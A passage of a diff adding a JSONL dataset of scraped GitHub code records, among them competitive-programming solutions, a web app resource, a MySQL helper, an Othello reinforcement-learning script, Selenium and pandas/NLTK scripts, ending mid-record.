diff --git "a/6470.jsonl" "b/6470.jsonl" new file mode 100644--- /dev/null +++ "b/6470.jsonl" @@ -0,0 +1,2053 @@ +{"seq_id":"21596277035","text":"prime = [1]*(3*10**6)\nprime[0] = 0; prime[1] = 0\nprimes = []\nfor n in range(2, len(prime)):\n if prime[n] == 0:\n continue\n for i in range(2*n, len(prime), n):\n prime[i] = 0\n primes.append(n)\n\nT = int(input())\nfor _ in range(T):\n N = int(input())\n ans = None\n for p in primes:\n if N%p==0:\n if N%(p**2) == 0:\n ans = [p, N//p**2]\n else:\n ans = [int((N//p)**0.5), p]\n break\n print(f\"{ans[0]} {ans[1]}\")","repo_name":"Programmerryoki/Competitive-Programming","sub_path":"Atcoder/ABC 284/D.py","file_name":"D.py","file_ext":"py","file_size_in_byte":502,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"72344361208","text":"from __future__ import with_statement\nimport logging\nimport math\nimport clevercss\nfrom restish import http, resource, templating\nfrom example.lib import base, guard\nimport adminish\nfrom couchish.couchish_formish_jsonbuilder import build\n\nfrom formish.fileresource import FileResource\nfrom formish.filestore import CachedTempFilestore\n\nimport couchish\nfrom couchish.filestore import CouchDBFilestore\n\nfrom operator import itemgetter\n\nlog = logging.getLogger(__name__)\n\n\nclass Root(base.BasePage):\n\n @resource.GET()\n @templating.page('root.html')\n def html(self, request):\n return {}\n\n @resource.child()\n def example(self, request, segments):\n return Example()\n\n @guard.guard(guard.is_admin())\n @resource.child()\n def admin(self, request, segments):\n return adminish.resource.Admin()\n \n @resource.child(resource.any)\n def page(self, request, segments):\n return PageResource(segments), ()\n\n @resource.child('filehandler')\n def filehandler(self, request, segments):\n tempfilestore = CachedTempFilestore(name='tmp')\n cdbfilestore = CouchDBFilestore(request.environ['couchish'], name='cdb')\n return FileResource(filestores=[cdbfilestore, tempfilestore])\n\n #####\n # clevercss\n @resource.child('ccss/{file}')\n def child_ccss(self, request, segments, file=None):\n return lambda request: self.css(request, file=file)\n\n def css(self, request, file):\n if file is None:\n return\n ccss = templating.render(request,'ccss/%s'%file, {})\n css = clevercss.convert(ccss)\n return http.ok([('Content-Type', 'text/css')], css)\n\n @resource.child('ccsss/{file}')\n def child_ccsss(self, request, segments, file=None):\n return lambda request: self.csss(request, file=file)\n\n def csss(self, request, file):\n if file is None:\n return\n ccss = templating.render(request,'ccss/%s'%file, {})\n return http.ok([],ccss)\n\n\nclass Example(base.BasePage):\n\n @resource.GET()\n def GET(self, request):\n \"\"\"\n http://localhost:8080/example?nd=1234901751220&_search=false&rows=10&page=1&sidx=url&sord=desc\n nd\n \"\"\"\n C = request.environ['couchish']\n M = request.environ['adminish']['page']\n T = C.config.types['page']\n try:\n page = int(request.GET.get('page'))\n except ValueError:\n page = 0\n try:\n numrows = int(request.GET.get('rows'))\n except ValueError:\n numrows = 10\n sortkey = request.GET.get('sidx')\n reverse = request.GET.get('sord')\n if reverse == 'asc':\n reverse = False\n else:\n reverse = True\n with C.session() as S:\n items = S.docs_by_type('page')\n items = list(items)\n items = sorted(items, key=itemgetter(sortkey), reverse=reverse)\n\n records = len(items)\n total_pages = int(math.ceil( float(records) / int(numrows) ))\n if page > 
total_pages:\n page = total_pages\n start = (page-1) * numrows\n end = page * numrows\n results = {'page': int(page), 'total': int(total_pages), 'records': records}\n rows = []\n for item in items[start:end]:\n rows.append( {'id':item['url'], 'cell':[item['url'], item['title']]} )\n\n results['rows'] = rows\n\n return http.ok([('Content-Type','text/javascript'),], couchish.jsonutil.dumps(results) )\n\n \nclass PageResource(base.BasePage):\n\n def __init__(self, segments):\n self.segments = segments\n\n @resource.GET(accept='html')\n @templating.page('page.html')\n def page(self, request):\n url = '/%s'%('/'.join(self.segments))\n C = request.environ['couchish']\n with C.session() as S:\n page = list(S.view('page/by_url',key=url,include_docs=True))\n return {'page': page[0].doc}\n\n\n\n\n","repo_name":"ish/adminish-example","sub_path":"example/resource/root.py","file_name":"root.py","file_ext":"py","file_size_in_byte":3924,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"}
+{"seq_id":"39052319138","text":"import h5py\nimport struct\n\nclass Order:\n def __init__(self, stk_code, order_id, direction, price, volume, type):\n self.stk_code = stk_code\n self.order_id = order_id\n self.direction = direction\n self.price = price\n self.volume = volume\n self.type = type\n\nclass Trade:\n def __init__(self, stk_code, bid_id, ask_id, price, volume):\n self.stk_code = stk_code\n self.bid_id = bid_id\n self.ask_id = ask_id\n self.price = price\n self.volume = volume\n\n def to_bytes(self):\n return struct.pack(\"=iiidi\", self.stk_code, self.bid_id, self.ask_id, self.price, self.volume)\n'''\ndef read_order_from_file(self, order_id_path, direction_path, price_path, volume_path, type_path):\n order_id_mtx = h5py.File(order_id_path, 'r')['order_id']\n direction_mtx = h5py.File(direction_path, 'r')['direction']\n price_mtx = h5py.File(price_path, 'r')['price']\n volume_mtx = h5py.File(volume_path, 'r')['volume']\n type_mtx = h5py.File(type_path, 'r')['type']\n x = 10\n y = 100\n z = 77\n return Order(x%10 + 1,\n order_id_mtx[x,y,z],\n DirectionType(direction_mtx[x,y,z]),\n price_mtx[x,y,z],\n volume_mtx[x,y,z],\n OrderType(type_mtx[x,y,z]))\n'''\ndef dump_trade(trade_list):\n with open(\"Ans\", 'wb') as f:\n f.write(b''.join(map(lambda x: x.to_bytes(), trade_list)))\n\n","repo_name":"museremarkable/UbiYagami","sub_path":"python/io_example/read_write.py","file_name":"read_write.py","file_ext":"py","file_size_in_byte":1433,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"}
+{"seq_id":"49392130426","text":"#!/usr/bin/python3\nimport mysql.connector\nfrom mysql.connector import Error\n#from metadata_parser import metadata_parser\nimport datetime\nimport os\nimport sys # needed for sys.exit() in ConnectDatabase's error handler\n\nclass MYSQL_SIM_DATA:\n def __init__(self,debug=0):\n print (\"Constructing....\")\n self.connection=None\n self.DEBUG=debug\n self.ConnectDatabase(os.environ['MYSQL_HOST'],os.environ['DB_NAME'],os.environ['DB_USERNAME'],os.environ['DB_PW'])\n def __del__(self):\n if self.connection is not None:\n self.connection.close()\n print (\"destructing.....\")\n def is_connected(self):\n return self.connection.is_connected()\n def ConnectDatabase(self,h, db, u ,pww):\n #type: (MYSQL_SIM_DATA,str,str,str,str)\n try:\n self.connection = mysql.connector.connect(host=h, database=db,user=u,password=pww)\n if self.is_connected():\n db_Info = self.connection.get_server_info()\n print(\"Connected to MySQL Server version \", db_Info)\n if self.DEBUG>0:\n cursor = 
self.connection.cursor()\n cursor.execute(\"select database();\")\n# cursor.execute(\"show tables;\")\n record = cursor.fetchone()\n print(\"You're connected to database: \", record)\n cursor.execute(\"show tables;\")\n record=cursor.fetchall()\n for i in range(len(record)):\n print(\"In database are these tables: \", record[i])\n print(\"show columns from \"+''.join(record[i]))\n cursor.execute(\"show columns from \"+''.join(record[i]))\n record2=cursor.fetchall()\n for j in range(len(record2)):\n print(record2[j])\n cursor.close()\n except Error as e:\n print(\"Error while connecting to MySQL\", e)\n sys.exit(1)\n# finally:\n# if (self.connection.is_connected()):\n# cursor.close()\n# self.connection.close()\n# print(\"MySQL connection is closed\")\n def det_data(self,run_file_ID,Run_date,run_number,type_Profile,Run_Start,Run_End,Shifter_ID,Detector_configuuration,Comment):\n #type: (MYSQL_SIM_DATA,str,str,str,str,str,str)\n #print username\n cursor=self.connection.cursor()\n# cursor.execute(\"select database()\")\n now=datetime.datetime.utcnow()\n cursor.execute(\"INSERT INTO det_detdata (run_file_ID,Run_date,run_number,type_Profile,Run_Start,Run_End,Detector_configuration,Comment) VALUES(%s,%s,%s,%s,%s,%s,%s,%s)\",(run_file_ID,Run_date,run_number,type_Profile,Run_Start,Run_End,Detector_configuuration,Comment) )\n \n cursor.execute('SELECT last_insert_id()')\n record = cursor.fetchone()\n# print(\"You're connected to database: \", record)\n self.connection.commit()\n cursor.close()\n return record[0]\n \n def det_runefiles (self,FileID,split_index,filename,Md5sum,filesize,filesid):\n #type: (MYSQL_SIM_DATA,str,str,int,int,str,str,str)\n cursor=self.connection.cursor()\n cursor.execute(\"INSERT INTO det_runfiles ( split_index,filename,Md5sum,filesize,filesID) VALUES(%s,%s,%s,%s,%s)\",( split_index,filename,Md5sum,filesize,filesid))\n cursor.execute('SELECT last_insert_id()')\n record = cursor.fetchone()\n # cursor.execute(\"UPDATE det_data SET run_file_ID=%s where ID=%s\"%(record[0],det_dataID))\n# cursor.execute\n self.connection.commit()\n cursor.close()\n return record[0]\n def det_ccfile (self, run_number,det_detdataID, split_index,Filepath,Filename,Filesize,Md5sum,reco_level,status,creation_data):\n #type:(MYSQL_SIM_DATA,int,int,str,int,int,str,str,str,str)\n cursor=self.connection.cursor()\n cursor.execute(\"INSERT INTO det_ccfile (run_number,det_detdataID, split_index,Filepath,Filename,Filesize,Md5sum,reco_level,status,creation_date) VALUES(%s,%s,%s,%s,%s,%s,%s,%s, %s,%s) \",(run_number,det_detdataID, split_index,Filepath,Filename,Filesize,Md5sum,reco_level,status,creation_data))\n cursor.execute('SELECT last_insert_id()')\n record = cursor.fetchone()\n# cursor.execute(\"UPDATE det_data SET run_file_ID=%s where run_number=%s\"%(record[0],det_dataID))\n # cursor.execute\n self.connection.commit()\n cursor.close()\n return record[0]\n\n\n def det_datatrans (self,trans_time,status ):\n #type:(MYSQL_SIM_DATA,int,int,str,int,int,str,str,str,str)\n cursor=self.connection.cursor()\n cursor.execute(\"INSERT INTO det_filetransfer ( transfer_time, status) VALUES(%s,%s) \",(trans_time,status))\n cursor.execute('SELECT last_insert_id()')\n record = cursor.fetchone()\n# cursor.execute(\"UPDATE det_data SET run_file_ID=%s where run_number=%s\"%(record[0],det_dataID))\n # cursor.execute\n self.connection.commit()\n cursor.close()\n return record[0]\n def det_data_comitioning(self,Run_date,Operators,run_number,duration,triger,description,comment,Detector_sys):\n cursor=self.connection.cursor()\n 
cursor.execute(\"INSERT INTO det_comitioning_data (Run_date,Operators,run_number,duration,triger,description,comments,Detector_sys) VALUES(%s,%s,%s,%s,%s,%s,%s,%s) \", (Run_date,Operators,run_number,duration,triger,description,comment,Detector_sys))\n self.connection.commit()\n cursor.close()\n\n\n#myconnect=MYSQL_SIM_DATA(0)\n#rec=myconnect.init_prod(\"breier\",\"nieco\",\"nieco\",\"nieco2\",\"nieco3\",\"nieco4\")\n#rec1=myconnect.store_simu(rec,\"cc\",\"/adresa/suboru/\",10000,10,\"hash\",\"5.6.7\",\"comentujem si\")\n#myconnect.store_reco(rec, rec1 ,\"/adresa/recosuboru/\",10000,10,10.6.1,1,,hash,comentujem )\n#:print(\"You're connected to database: \", rec)\n#conf_path=\"../simdata/\"\n#filename=\"output_files.d/file_0.meta\"\n#mp=metadata_parser(0)\n#mp.parse_file(conf_path,filename)\n#print mp.data\n","repo_name":"robobre/SNcopy","sub_path":"database_connector.py","file_name":"database_connector.py","file_ext":"py","file_size_in_byte":6030,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"3490844558","text":"from django.contrib import admin\nfrom mptt.admin import DraggableMPTTAdmin\nfrom .models import Course, Topics, Links, TopicArticle\nfrom reversion_compare.admin import CompareVersionAdmin\nfrom reversion_compare.mixins import CompareMixin\nfrom django.db.models import Manager\n# Register your models here.\n\n_old_compare = CompareMixin.compare\n\n\ndef compare(self, obj, version1, version2):\n def replace_taggit_field(version_ins):\n for fieldname in version_ins.field_dict:\n if isinstance(version_ins.field_dict[fieldname], Manager):\n version_ins.field_dict[fieldname] = []\n replace_taggit_field(version1)\n replace_taggit_field(version2)\n return _old_compare(self, obj, version1, version2)\n\nCompareMixin.compare = compare\n\nclass TopicArticleAdmin(CompareVersionAdmin):\n pass\n\nadmin.site.register(Course)\nadmin.site.register(Links)\nadmin.site.register(TopicArticle, TopicArticleAdmin)\n\n\n\nadmin.site.register(\n Topics,\n DraggableMPTTAdmin,\n list_display=(\n 'tree_actions',\n 'indented_title',\n # ...more fields if you feel like it...\n ),\n list_display_links=(\n 'indented_title',\n ),\n)\n","repo_name":"fresearchgroup/Collaboration-System","sub_path":"Course/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1170,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"77"} +{"seq_id":"14300362082","text":"#\n\nimport re\nimport struct\nimport numpy as np\nimport scipy.sparse as sp\nimport pickle\n\nimport datetime\n\nclass Corpus:\n def __init__(self, voca):\n self.__i2p = []\n self.__p2i = {}\n self.__i2m = []\n self.__voca = voca\n self.__dirty = False\n \n def save(self, paths_file, index_file, matrix_file):\n with open(paths_file, 'wb') as f:\n pickle.dump(self.__i2p, f, protocol=pickle.HIGHEST_PROTOCOL)\n \n with open(index_file, 'wb') as f:\n pickle.dump(self.__i2m, f, protocol=pickle.HIGHEST_PROTOCOL)\n \n with open(matrix_file, 'wb') as f:\n pickle.dump(self.get_matrix(), f, protocol=pickle.HIGHEST_PROTOCOL)\n \n def load(self, paths_file, index_file, matrix_file):\n # print('reading paths.')\n with open(paths_file, 'rb') as f:\n self.__i2p = pickle.load(f)\n self.__p2i = { path: i for i, path in enumerate(self.__i2p) }\n \n # print('reading index.')\n if index_file:\n with open(index_file, 'rb') as f:\n self.__i2m = pickle.load(f)\n else:\n self.__i2m = None\n \n # print('reading matrix.')\n with open(matrix_file, 'rb') as f:\n self.__mat = 
pickle.load(f)\n # print('done.')\n self.__dirty = False\n \n def add(self, path, words):\n try:\n i = self.__p2i[path]\n except KeyError:\n i = len(self.__i2p)\n self.__i2p.append(path)\n self.__p2i[path] = i\n \n m = { self.__voca.get_no(word) for word in words }\n \n while len(self.__i2m) < i + 1:\n self.__i2m.append(None)\n self.__i2m[i] = m\n \n self.__dirty = True\n\n def remove(self, path):\n try:\n i = self.__p2i[path]\n self.__i2p[i] = None\n del self.__p2i[path]\n self.__i2m[i] = None\n except KeyError:\n pass\n \n self.__dirty = True\n \n def clear(self):\n self.__i2p = None\n self.__p2i = None\n self.__i2m = None\n self.__voca = None\n self.__mat = None\n\n def get_path(self, i):\n return self.__i2p[i]\n \n def get_sub_paths(self, folders):\n return { i for i, p in enumerate(self.__i2p) if p is not None and re.sub(r'/\\d+$', '', p) in folders }\n \n def get_matrix(self):\n if not self.__dirty:\n return self.__mat\n rows = []\n cols = []\n for i, m in enumerate(self.__i2m):\n if m:\n rows += [ i ] * len(m)\n cols += list(m)\n self.__mat = sp.csr_matrix(( [1] * len(cols), ( rows, cols ) ), shape=(len(self.__i2m), self.__voca.size()), dtype=np.int8)\n self.__dirty = False\n return self.__mat\n","repo_name":"masm11/mewgrep","sub_path":"corpus.py","file_name":"corpus.py","file_ext":"py","file_size_in_byte":2828,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"12940268561","text":"import othelloDriver as OD\nimport torch\nfrom torch import nn\nfrom torch.autograd import Variable\nfrom torch.nn import functional\nimport random\n\n# The model to be loaded to continue training. Leave this value empty or false to not load any file.\nLOAD_MODEL = \"\" #\"in.pth\"\n\n# The model to save to. Saves happen every 500 episodes. Leave empty or false for no saving.\nSAVE_MODEL = \"\" #\"out.pth\"\n\n# The file to write stats to. 
Leave empty or false for no saving.\nSTATS_FILE = \"\" # output.txt\n\n# How many episodes to train for\nEPISODE_COUNT = 5000\n\nclass NN(nn.Module): #simple CNN\n def __init__(self):\n super().__init__()\n \n self.C1 = nn.Conv2d(2, 64, 3, padding=1)\n self.C2 = nn.Conv2d(64, 128, 3, padding=1)\n self.P1 = nn.MaxPool2d(2, 2)\n\n self.flatten = nn.Flatten(-3, -1)\n self.linear_relu_stack = nn.Sequential(\n nn.Linear(4*4*128, 256),\n nn.ReLU(),\n nn.Linear(256, 128),\n nn.ReLU(),\n nn.Linear(128, 64), \n nn.Sigmoid(),\n )\n\n def forward(self, x):\n x = functional.relu(self.C1(x))\n x = functional.relu(self.C2(x))\n x = self.P1(x)\n\n x = self.flatten(x)\n\n logits = self.linear_relu_stack(x)\n return logits\n\n\nclass agent:\n \n func = None\n device = None\n opt = None\n lossFunc = None\n\n LR = 0.0001\n PV = 0.9\n GREEDY = 0.1\n\n def __init__(self):\n self.device = (\"cuda\" if torch.cuda.is_available() else \"mps\" if torch.backends.mps.is_available() else \"cpu\")\n print(f\"Using {self.device} device\")\n self.func = NN().to(self.device)\n self.opt = torch.optim.Adam(self.func.parameters(), lr = self.LR)\n\n self.lossFunc = nn.MSELoss()\n\n self.softmaxCache = {}\n\n self.rng64 = [i for i in range(64)]\n\n if LOAD_MODEL:\n self.func.load_state_dict(torch.load(LOAD_MODEL)) # load the checkpoint named in LOAD_MODEL above\n\n def scoot(self, brd, tkn, g):\n g = Variable(torch.tensor(g), requires_grad = False).to(self.device)\n \n pred = self.predict(self.constructTensor(brd, tkn))\n\n loss = self.lossFunc(pred, g)\n\n loss.backward()\n self.opt.step()\n self.opt.zero_grad()\n\n return loss.item()\n \n def constructTensor(self, brd, tkn):\n self.lastBrd = brd #for caching purposes\n self.lastTkn = tkn\n\n # 8 x 8 x 2\n # 1 --> current player's tkns\n # 2 --> opponent's tkns\n opp = 'x' if tkn == 'o' else 'o'\n\n l1 = [[1.0 if brd[i*8+j] == tkn else 0.0 for j in range(8)] for i in range(8)]\n l2 = [[1.0 if brd[i*8+j] == opp else 0.0 for j in range(8)] for i in range(8)]\n\n f = [l1, l2]\n\n f = Variable(torch.tensor(f), requires_grad = True).to(self.device)\n\n return f\n\n\n def predict(self, f):\n pred = self.func(f)\n return pred\n \n def softmax(self, vec):\n if (self.lastBrd, self.lastTkn) in self.softmaxCache:\n return self.softmaxCache[(self.lastBrd, self.lastTkn)]\n sm = sum(vec)\n res = [v/sm for v in vec]\n self.softmaxCache[(self.lastBrd, self.lastTkn)] = res\n return res\n \n def simulateMove(self, brd, tkn, pred=False, egreed=True):\n if pred == False: \n pred = self.predict(self.constructTensor(brd, tkn)).tolist()\n if egreed:\n eps = random.random()\n else:\n eps = 1\n if eps < self.GREEDY:\n #do e-greedy move\n return (random.randint(0, 63), pred)\n else:\n # ^ 64x1 vector, probabilities\n probs = self.softmax(pred)\n return (random.choices([i for i in range(64)], weights=probs)[0], pred)\n\n def simulateMoveTensor(self, f, pred=False):\n if pred == False: \n pred = self.predict(f).tolist()\n\n eps = random.random()\n if eps < self.GREEDY:\n #do e-greedy move\n return (random.randint(0, 63), pred)\n else:\n # ^ 64x1 vector, probabilities\n probs = self.softmax(pred)\n return (random.choices(self.rng64, weights=probs)[0], pred)\n\n\n\ndef train(f, g, agt):\n\n f = f.to(agt.device)\n g = g.to(agt.device)\n\n pred = agt.func(f)\n\n loss = agt.lossFunc(pred, g)\n\n loss.backward()\n agt.opt.step()\n agt.opt.zero_grad()\n\n return loss.item()\n\ndef test(agt):\n brd = '.'*27 + \"ox......xo\" + '.'*27\n tkn = 'x'\n\n goofs = 0\n while True:\n mvs = OD.getPossibleMovesDots(brd, tkn)\n \n if not mvs:\n break\n \n picked, pred = 
agt.simulateMove(brd, tkn)\n \n #print(picked)\n\n if picked not in mvs:\n goofs += 1\n else:\n brd = OD.playMove(brd, tkn, picked)\n tkn = OD.opponent[tkn]\n\n print(\"Goofs\", goofs)\n\ndef fullTest(agt, iterations):\n agt.func.eval()\n\n roundedError = 0\n squaredError = 0\n randomGoof = 0\n selectionGoof = 0\n totalDepth = 0\n print()\n for trial in range(100):\n brd = '.'*27 + \"ox......xo\" + '.'*27\n tkn = 'x'\n\n while True:\n mvs = OD.getPossibleMovesDots(brd, tkn)\n \n if not mvs:\n totalDepth += 64 - brd.count('.')\n break\n\n agtChoice, pred = agt.simulateMove(brd, tkn, egreed=False)\n\n ans = [1.0 if mv in mvs else 0.0 for mv in range(64)]\n mx, mxInd = -1, -1\n for pos in range(64):\n roundedChoice = round(pred[pos])\n if int(roundedChoice) != int(ans[pos]):\n roundedError += 1\n squaredError += (pred[pos] - ans[pos]) ** 2\n\n if pred[pos] > mx:\n mx = pred[pos]\n mxInd = pos\n \n if int(ans[agtChoice]) != 1:\n randomGoof += 1\n \n if int(ans[mxInd]) != 1:\n selectionGoof += 1\n\n picked = random.choice([*mvs])\n\n brd = OD.playMove(brd, tkn, picked)\n tkn = OD.opponent[tkn]\n \n if trial%5 == 0:\n print('$', end='', flush=True)\n print()\n if outfile:\n outfile.write(f\"Iterations: {iterations}\\n\")\n outfile.write(f\"Rounded Error: {roundedError/100}\\n\")\n outfile.write(f\"MSE Error: {squaredError/100}\\n\")\n outfile.write(f\"Random Goofs: {randomGoof/100}\\n\")\n outfile.write(f\"Selection Goofs: {selectionGoof/100}\\n\")\n outfile.write(f\"Avg Depth: {totalDepth/100}\\n\")\n outfile.flush()\n\n print(f\"Iterations: {iterations}\")\n print(f\"Rounded Error: {roundedError/100}\")\n print(f\"MSE Error: {squaredError/100}\")\n print(f\"Random Goofs: {randomGoof/100}\")\n print(f\"Selection Goofs: {selectionGoof/100}\")\n print(f\"Avg Depth: {totalDepth/100}\")\n\n agt.func.train()\n\ndef simulateEpisode(agt):\n global avgd\n brd = '.'*27 + \"ox......xo\" + '.'*27\n tkn = 'x'\n\n batch = []\n\n depth = 0\n while True:\n depth += 1\n mvs = OD.getPossibleMovesDots(brd, tkn)\n \n if not mvs:\n break\n\n f = agt.constructTensor(brd, tkn)\n picked, pred = agt.simulateMoveTensor(f)\n \n while picked not in mvs: \n if picked != -1:\n pred[picked] = 0\n picked, __ = agt.simulateMoveTensor(f, pred=pred)\n\n \n pred[picked] = 1\n\n batch.append((f, pred))\n\n brd = OD.playMove(brd, tkn, picked)\n tkn = OD.opponent[tkn]\n \n avgd += depth\n\n f, g = [], []\n for tpl in batch:\n fe, ans = tpl\n f.append(fe)\n g.append(ans)\n\n f = torch.stack(f, 0)\n g = Variable(torch.tensor(g), requires_grad = False)\n\n lss = train(f, g, agt)\n \nif __name__ == \"__main__\":\n global outfile\n if STATS_FILE:\n outfile = open(STATS_FILE, 'w')\n else:\n outfile = False\n\n global avgd\n avgd = 0\n agt = agent()\n OD.setGlobals()\n\n for i in range(EPISODE_COUNT + 1):\n if i%500 == 0:\n if SAVE_MODEL:\n torch.save(agt.func.state_dict(), SAVE_MODEL)\n if i%1000 == 0:\n fullTest(agt, i)\n if i%10 == 0:\n print(f\"*\", end=\"\", flush=True)\n simulateEpisode(agt)\n\n\n\n\n","repo_name":"ChiMasterBing/Offline-Model-Learning","sub_path":"onlineLearning.py","file_name":"onlineLearning.py","file_ext":"py","file_size_in_byte":8272,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"21763702632","text":"from selenium.webdriver.support.ui import Select\nfrom selenium import webdriver\nimport math\nimport os\nimport time\n\n\ndef calc(x):\n return str(math.log(abs(12 * math.sin(int(x)))))\n\n\nif __name__ == '__main__':\n try:\n page_url = 
'http://suninjuly.github.io/file_input.html'\n\n browser = webdriver.Chrome()\n browser.get(page_url)\n\n elements = browser.find_elements_by_css_selector('.form-group > input')\n for element in elements:\n element.send_keys('Answer')\n\n upload_file = browser.find_element_by_id('file')\n\n curr_dir = os.path.abspath(os.path.dirname(__file__))\n file_path = os.path.join(curr_dir, 'input.txt')\n upload_file.send_keys(file_path)\n\n btn = browser.find_element_by_class_name('btn')\n btn.click()\n\n except Exception as e:\n print(e)\n finally:\n time.sleep(15)\n browser.quit()\n","repo_name":"Jeniamakarchik/selenium_course","sub_path":"week2/file.py","file_name":"file.py","file_ext":"py","file_size_in_byte":905,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
+{"seq_id":"6311113188","text":"# @Time : 2022/10/26 14:22 \n# @Author : CaoXiang\n# @Description: drawing utilities, e.g. marking detection boxes, class labels and person names\nimport numpy as np\nfrom PIL import Image, ImageDraw, ImageFont\nimport typing\nimport matplotlib.pyplot as plt\n\ndef draw_box(arr: np.ndarray, cords: typing.List[int], color: typing.Tuple[int, int, int],\n thickness: int) -> np.ndarray:\n \"\"\"\n Draw a rectangular box on the original image.\n :param arr: the original image as an ndarray\n :param cords: box coordinates, organized as [xmin, ymin, xmax, ymax]\n :param color: color of the box\n :param thickness: width of the box outline\n :return: the image with the box drawn, still as an ndarray\n \"\"\"\n assert len(cords) == 4, \"cords must have 4 elements as xmin ymin xmax ymax.\"\n assert isinstance(arr, np.ndarray), \"input must be type of numpy ndarray.\"\n img = Image.fromarray(arr)\n draw = ImageDraw.Draw(img)\n draw.rectangle(xy=cords, outline=color, width=thickness)\n img = np.array(img)\n return img\n\n\ndef draw_text(arr: np.ndarray, cords: typing.List[int], text:str, color:typing.Tuple[int, int, int],\n thickness: int) -> np.ndarray:\n \"\"\"\n Draw text information on the original image.\n :param arr: the original image as an ndarray\n :param cords: anchor coordinates of the text, organized as [xmin, ymin]\n :param text: the text to print\n :param color: color of the text\n :param thickness: stroke width of the text\n :return: the image with the text drawn, still as an ndarray\n \"\"\"\n assert len(cords) == 2, \"cords must have 2 elements as xmin ymin.\"\n assert isinstance(arr, np.ndarray), \"input must be type of numpy ndarray.\"\n img = Image.fromarray(arr)\n draw = ImageDraw.Draw(img)\n draw.text(xy=cords, fill=color, stroke_width=thickness, text=text)\n img = np.array(img)\n return img\n\n\nif __name__ == '__main__':\n arr = np.ones((124, 124, 3)).astype(np.uint8) * 255\n arr = draw_box(arr, cords=[10, 10, 30, 30], color=(255, 0, 0), thickness=2)\n arr = draw_text(arr, cords=[50, 50], color=(0, 255, 0), thickness=2, text=\"Hello!\")\n plt.figure()\n plt.imshow(arr)\n plt.show()\n\n\n","repo_name":"AdamMayor2018/VideoAudition","sub_path":"tools/draw.py","file_name":"draw.py","file_ext":"py","file_size_in_byte":2167,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"}
+{"seq_id":"1118555085","text":"import argparse\nimport logging\nimport pandas as pd\nimport hashlib\nfrom urllib.parse import urlparse\nimport nltk\nfrom nltk.corpus import stopwords\n\nlogging.basicConfig(level=logging.INFO)\nlogger = logging.getLogger(__name__)\n\nstop_words = set(stopwords.words('spanish'))\n\n\ndef main(filename):\n logger.info('Starting the cleaning process')\n\n df = _read_data(filename)\n\n site_id = _extract_site_id(filename)\n df = _add_column(df, 'site_id', site_id)\n df = _extract_host(df)\n df = _fill_missing_titles(df)\n df = _set_rows_uids(df)\n df = _remove_escape_chars(df)\n df = _tokenize_column(df, 'title')\n df = 
_tokenize_column(df, 'body')\n df = _remove_duplicates(df, 'title')\n df = _remove_duplicates(df, 'url')\n df = _drop_rows_with_missing_data(df)\n\n _save_data(df, filename)\n\n return df\n\n\ndef _read_data(filename):\n logger.info('Reading file {}'.format(filename))\n return pd.read_csv(filename)\n\n\ndef _extract_site_id(filename):\n logger.info('Extracting site id')\n site_id = filename.split('-')[0]\n logger.info('Site id {}'.format(site_id))\n return site_id\n\n\ndef _add_column(df, name, value):\n logger.info('Adding column {}, with value {}'.format(name, value))\n df[name] = value\n return df\n\n\ndef _extract_host(df):\n logger.info('Extracting urls host')\n df['host'] = df['url'].apply(lambda url: urlparse(url).netloc)\n return df\n\n\ndef _fill_missing_titles(df):\n logger.info('Filling missing titles')\n missing_titles_mask = df['title'].isna()\n missing_titles = df[missing_titles_mask]['url'].str.extract(\n r'(?P[^/]+)$').applymap(lambda title: title.replace('-', ' '))\n df.loc[missing_titles_mask, 'title'] = missing_titles.loc[:, 'missing_titles']\n return df\n\n\ndef _set_rows_uids(df):\n logger.info('Setting rows uids')\n uids = df.apply(lambda row: hashlib.md5(\n bytes(row['url'].encode())).hexdigest(), axis=1)\n df['uid'] = uids\n df.set_index('uid', inplace=True)\n return df\n\n\ndef _remove_escape_chars(df):\n logger.info('Removing escape characters from body')\n stripped_body = df.apply(lambda row: row['body'].replace(\n '\\n', '').replace('\\r', ''), axis=1)\n df['body'] = stripped_body\n return df\n\n\ndef _tokenize_column(df, column_name):\n logger.info('Tokenizing {} column'.format(column_name))\n tokenized = (df.apply(lambda row: nltk.word_tokenize(row[column_name]), axis=1)\n .apply(lambda tokens: list(filter(lambda token: token.isalpha(), tokens)))\n .apply(lambda tokens: list(map(lambda token: token.lower(), tokens)))\n .apply(lambda words_list: len(list(filter(lambda word: word not in stop_words, words_list)))))\n\n df['n_tokens_{}'.format(column_name)] = tokenized\n return df\n\n\ndef _remove_duplicates(df, column_name):\n logger.info('Removing duplicate entries from {} column'.format(column_name))\n df.drop_duplicates(subset=[column_name], keep='first', inplace=True)\n return df\n\n\ndef _drop_rows_with_missing_data(df):\n logger.info('Removing rows with missing data')\n return df.dropna()\n\n\ndef _save_data(df, filename):\n clean_filename = 'clean-{}'.format(filename)\n logger.info('Exporting datafram to {}'.format(clean_filename))\n df.to_csv(clean_filename)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('filename', help=\"The path to the raw data\", type=str)\n\n args = parser.parse_args()\n\n df = main(args.filename)\n\n print(df)\n","repo_name":"nicolaslazzos/basic-web-scraper","sub_path":"transform/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3519,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"73039088888","text":"\n# VArious places to declare static Variables\nclass Test:\n a=10\n def __init__(self):\n Test.b=20\n\n def m1(self):\n Test.c=30\n\n @classmethod\n def m2(cls):\n cls.d1=40\n Test.d2=400\n\n @staticmethod\n def m3():\n 